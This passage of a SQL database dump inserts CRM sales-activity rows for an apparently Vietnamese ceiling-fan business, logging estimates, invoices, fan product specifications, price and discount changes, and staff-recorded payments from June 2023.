Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '17', 'Loan Nguyễn', '2023-06-12 09:22:32'),
(2180, 'invoice', 299, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-12 09:31:27'),
(2181, 'invoice', 299, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-06-12 09:31:27'),
(2182, 'invoice', 299, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"4200000.00\";i:1;s:7:\"8400000\";}', '1', 'Ho Gia Phat', '2023-06-12 10:27:25'),
(2183, 'invoice', 299, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"40\";}', '1', 'Ho Gia Phat', '2023-06-12 10:27:25'),
(2184, 'invoice', 300, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-06-12 10:28:38'),
(2185, 'invoice', 300, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:393:\"Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)  <br />\r\n\";i:1;s:353:\"Sải cánh 152cm ( ~ 60inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  \r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  \r\nMàu cánh: Gỗ sáng (Maple Wood)  \r\nTuỳ chọn đèn: N/A (không có)\";}', '17', 'Loan Nguyễn', '2023-06-12 10:30:18'),
(2186, 'invoice', 300, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-06-12 10:30:18'),
(2187, 'invoice', 300, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-12 10:30:26'),
(2188, 'invoice', 300, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-06-12 10:30:26'),
(2189, 'invoice', 299, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-06-14 09:29:41'),
(2190, 'invoice', 299, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"10.080.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/311\" target=\"_blank\">#311</a>\";}', '1', 'Ho Gia Phat', '2023-06-14 09:29:41'),
(2191, 'estimate', 207, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-06-14 15:54:09'),
(2192, 'invoice', 301, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-06-14 15:54:33'),
(2193, 'estimate', 207, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/301\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-06-14 15:54:33'),
(2194, 'invoice', 301, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-14 15:54:48'),
(2195, 'invoice', 301, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-06-14 15:54:48'),
(2196, 'invoice', 300, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-14 16:43:43'),
(2197, 'invoice', 300, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.260.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/312\" target=\"_blank\">#312</a>\";}', '17', 'Loan Nguyễn', '2023-06-14 16:43:43'),
(2198, 'estimate', 208, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-06-15 09:38:22'),
(2199, 'invoice', 302, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-06-15 09:38:31'),
(2200, 'estimate', 208, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/302\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-06-15 09:38:31'),
(2201, 'invoice', 302, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-15 09:38:47'),
(2202, 'invoice', 302, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-06-15 09:38:47'),
(2203, 'estimate', 209, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-06-15 11:01:44'),
(2204, 'estimate', 209, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-06-15 11:01:54'),
(2205, 'estimate', 209, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>4</status>\";}', '17', 'Loan Nguyễn', '2023-06-15 11:02:00'),
(2206, 'invoice', 303, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-06-15 11:02:07'),
(2207, 'estimate', 209, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/303\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-06-15 11:02:07'),
(2208, 'invoice', 303, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-15 11:02:13'),
(2209, 'invoice', 303, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-06-15 11:02:13'),
(2210, 'invoice', 297, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:23:\"Chi phí vận chuyển\";}', '17', 'Loan Nguyễn', '2023-06-15 17:34:41'),
(2211, 'invoice', 297, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"400000.00\";i:1;s:9:\"375000.00\";}', '17', 'Loan Nguyễn', '2023-06-16 10:10:13'),
(2212, 'invoice', 297, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"375000.00\";i:1;s:9:\"750000.00\";}', '17', 'Loan Nguyễn', '2023-06-16 11:32:37'),
(2213, 'invoice', 297, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"50\";}', '17', 'Loan Nguyễn', '2023-06-16 11:32:37'),
(2214, 'invoice', 297, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-16 11:33:02'),
(2215, 'invoice', 297, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"19.415.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/313\" target=\"_blank\">#313</a>\";}', '17', 'Loan Nguyễn', '2023-06-16 11:33:02'),
(2216, 'estimate', 210, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-06-16 15:31:29'),
(2217, 'estimate', 210, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:40:\"Chi phí nhân công sửa chữa quạt\";}', '17', 'Loan Nguyễn', '2023-06-16 15:32:33'),
(2218, 'estimate', 210, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-06-16 15:32:38'),
(2219, 'estimate', 210, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:31:\"Thay thế bộ điều khiển\";}', '17', 'Loan Nguyễn', '2023-06-16 15:34:49'),
(2220, 'estimate', 211, 'estimate_activity_created', '', '16', 'Phuc Dang', '2023-06-16 16:10:28'),
(2221, 'estimate', 212, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-06-20 10:01:37'),
(2222, 'estimate', 212, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:39:\"Nhân công lắp đặt quạt trần \";i:1;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-06-20 10:07:20'),
(2223, 'estimate', 212, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>4</status>\";}', '17', 'Loan Nguyễn', '2023-06-20 10:07:24'),
(2224, 'estimate', 212, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:319:\"Sải cánh 132cm (52inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Trắng  <br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)\";i:1;s:262:\"Sải cánh 132cm (52inch)    \r\nĐộng cơ EC, công suất 20.9W    \r\nMàu thân/cánh: Trắng  \r\nĐiều khiển từ xa 7 cấp đi kèm \r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) \r\nThương hiệu: Haiku/USA \";}', '17', 'Loan Nguyễn', '2023-06-20 10:08:09'),
(2225, 'estimate', 212, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"21800000.00\";i:1;s:11:\"21500000.00\";}', '17', 'Loan Nguyễn', '2023-06-20 10:25:24'),
(2226, 'estimate', 212, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:292:\"Sải cánh 132cm (52inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Trắng  <br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA \";i:1;s:261:\"Sải cánh 132cm (52inch)    \r\nĐộng cơ EC, công suất 20.9W    \r\nMàu thân/cánh: Trắng  \r\nĐiều khiển từ xa 7 cấp đi kèm \r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) \r\nThương hiệu: Haiku/USA\";}', '17', 'Loan Nguyễn', '2023-06-20 10:25:24'),
(2227, 'estimate', 212, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-06-21 12:53:18'),
(2228, 'estimate', 212, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:29:\"Bộ đèn LED Haiku L series\";}', '17', 'Loan Nguyễn', '2023-06-21 12:53:18'),
(2229, 'estimate', 212, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-06-21 12:53:18'),
(2230, 'estimate', 212, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:134:\"Độ sáng 16 cấp điều chỉnh dimmable\r\nÁnh sáng: 2700K\r\nCông suất 16.3W\r\nBộ đèn chỉ dùng cho quạt Haiku L series\";}', '17', 'Loan Nguyễn', '2023-06-21 12:54:42'),
(2231, 'invoice', 293, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-06-22 01:00:02'),
(2232, 'estimate', 213, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-06-23 14:27:55'),
(2233, 'estimate', 213, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>4</status>\";}', '17', 'Loan Nguyễn', '2023-06-23 14:28:04'),
(2234, 'invoice', 304, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-06-23 14:28:07'),
(2235, 'estimate', 213, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/304\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-06-23 14:28:07'),
(2236, 'invoice', 304, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '17', 'Loan Nguyễn', '2023-06-23 14:28:47'),
(2237, 'invoice', 304, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-23 14:28:57'),
(2238, 'invoice', 304, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-06-23 14:28:57'),
(2239, 'estimate', 210, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-06-24 01:00:02'),
(2240, 'invoice', 305, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-06-26 09:36:52'),
(2241, 'invoice', 305, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:393:\"Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)  <br />\r\n\";i:1;s:353:\"Sải cánh 152cm ( ~ 60inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  \r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  \r\nMàu cánh: Gỗ sáng (Maple Wood)  \r\nTuỳ chọn đèn: N/A (không có)\";}', '17', 'Loan Nguyễn', '2023-06-26 09:38:05'),
(2242, 'invoice', 305, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-26 09:38:12'),
(2243, 'invoice', 305, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-06-26 09:38:12'),
(2244, 'invoice', 305, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-26 10:49:44'),
(2245, 'invoice', 305, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.760.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/314\" target=\"_blank\">#314</a>\";}', '17', 'Loan Nguyễn', '2023-06-26 10:49:44'),
(2246, 'invoice', 306, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-06-26 10:57:12'),
(2247, 'invoice', 307, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-06-26 16:48:42'),
(2248, 'invoice', 307, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-26 16:48:48'),
(2249, 'invoice', 307, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-06-26 16:48:48'),
(2250, 'estimate', 210, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:40:\"Chi phí nhân công sửa chữa quạt\";i:1;s:41:\"Chi phí Bảo Trì, Bảo dưỡng quath\";}', '17', 'Loan Nguyễn', '2023-06-27 14:59:43'),
(2251, 'estimate', 210, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:31:\"Thay thế bộ điều khiển\";i:1;s:0:\"\";}', '17', 'Loan Nguyễn', '2023-06-27 14:59:43'),
(2252, 'invoice', 308, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-06-27 14:59:52'),
(2253, 'estimate', 210, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/308\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-06-27 14:59:52'),
(2254, 'invoice', 308, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-27 15:00:07'),
(2255, 'invoice', 308, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-06-27 15:00:07'),
(2256, 'invoice', 309, 'invoice_activity_created', '', '15', 'Linh Nguyen Thuy', '2023-06-27 15:04:18'),
(2257, 'estimate', 182, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/309\">INV-DRAFT</a>\";}', '15', 'Linh Nguyen Thuy', '2023-06-27 15:04:18');
INSERT INTO `tblsales_activity` (`id`, `rel_type`, `rel_id`, `description`, `additional_data`, `staffid`, `full_name`, `date`) VALUES
(2258, 'invoice', 309, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '15', 'Linh Nguyen Thuy', '2023-06-27 15:04:29'),
(2259, 'invoice', 309, 'invoice_activity_marked_as_sent', 'a:0:{}', '15', 'Linh Nguyen Thuy', '2023-06-27 15:04:29'),
(2260, 'estimate', 214, 'estimate_activity_created', '', '16', 'Phuc Dang', '2023-06-28 10:35:38'),
(2261, 'estimate', 214, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:329:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm \";i:1;s:298:\"Sải cánh 132cm ( ~ 52inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   \r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   \r\nĐèn LED: 3 màu, 2700K - 3000K   \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '16', 'Phuc Dang', '2023-06-28 10:36:38'),
(2262, 'estimate', 214, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '16', 'Phuc Dang', '2023-06-28 10:36:38'),
(2263, 'estimate', 214, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:36:\"Quạt trần SINO LED 52 White Wood\";}', '16', 'Phuc Dang', '2023-06-28 11:03:10'),
(2264, 'estimate', 214, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:36:\"Quạt trần SINO LED 52 White Wood\";}', '16', 'Phuc Dang', '2023-06-28 11:03:10'),
(2265, 'estimate', 215, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-06-28 11:32:33'),
(2266, 'estimate', 215, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-06-28 11:32:39'),
(2267, 'estimate', 215, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"1800000.00\";i:1;s:10:\"2500000.00\";}', '17', 'Loan Nguyễn', '2023-06-28 11:35:32'),
(2268, 'estimate', 215, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:54:\"Thay bạc đạn vòng bi cho động cơ quạt Sino\";i:1;s:34:\"Thay mới động cơ quạt Sino\";}', '17', 'Loan Nguyễn', '2023-06-28 11:35:32'),
(2269, 'estimate', 216, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-06-29 11:53:31'),
(2270, 'estimate', 216, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-06-29 11:53:35'),
(2271, 'estimate', 216, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:36:\"Quạt trần 3 cánh gỗ PEARL 60 \";i:1;s:35:\"Quạt trần 3 cánh gỗ PEARL 60\";}', '17', 'Loan Nguyễn', '2023-06-29 13:51:35'),
(2272, 'estimate', 216, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:792:\"Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối)/Cherry<br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:713:\"Model: NW 1902\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối)/Cherry\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '17', 'Loan Nguyễn', '2023-06-29 13:51:35'),
(2273, 'estimate', 216, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:39:\"Nhân công lắp đặt quạt trần \";i:1;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-06-29 13:51:35'),
(2274, 'estimate', 216, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:791:\"Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối)/Cherry<br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm\";i:1;s:683:\"Model: NW 1902\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Cherry (chất liệu gỗ tự nhiên nguyên khối)\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '17', 'Loan Nguyễn', '2023-06-29 13:58:33'),
(2275, 'estimate', 216, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:35:\"Quạt trần 3 cánh gỗ PEARL 60\";}', '17', 'Loan Nguyễn', '2023-06-29 14:02:51'),
(2276, 'estimate', 216, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:36:\"Quạt trần 3 cánh gỗ PEARL 60 \";}', '17', 'Loan Nguyễn', '2023-06-29 14:02:51'),
(2277, 'estimate', 217, 'estimate_activity_created', '', '16', 'Phuc Dang', '2023-06-29 14:20:45'),
(2278, 'estimate', 216, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"8600000.00\";i:1;s:10:\"6000000.00\";}', '17', 'Loan Nguyễn', '2023-06-29 14:21:56'),
(2279, 'estimate', 216, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:36:\"Quạt trần 3 cánh gỗ PEARL 60 \";i:1;s:35:\"Quạt trần 3 cánh gỗ PEARL 60\";}', '17', 'Loan Nguyễn', '2023-06-29 14:21:56'),
(2280, 'estimate', 216, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:763:\"Model: NW1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Cherry ( chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:684:\"Model: NW1902\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Cherry ( chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '17', 'Loan Nguyễn', '2023-06-29 14:21:56'),
(2281, 'estimate', 216, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:35:\"Quạt trần 3 cánh gỗ PEARL 60\";}', '17', 'Loan Nguyễn', '2023-06-29 14:23:13'),
(2282, 'estimate', 216, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:36:\"Quạt trần 3 cánh gỗ PEARL 60 \";}', '17', 'Loan Nguyễn', '2023-06-29 14:23:13'),
(2283, 'invoice', 310, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-06-29 14:23:24'),
(2284, 'estimate', 216, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/310\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-06-29 14:23:24'),
(2285, 'invoice', 310, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-29 14:23:34'),
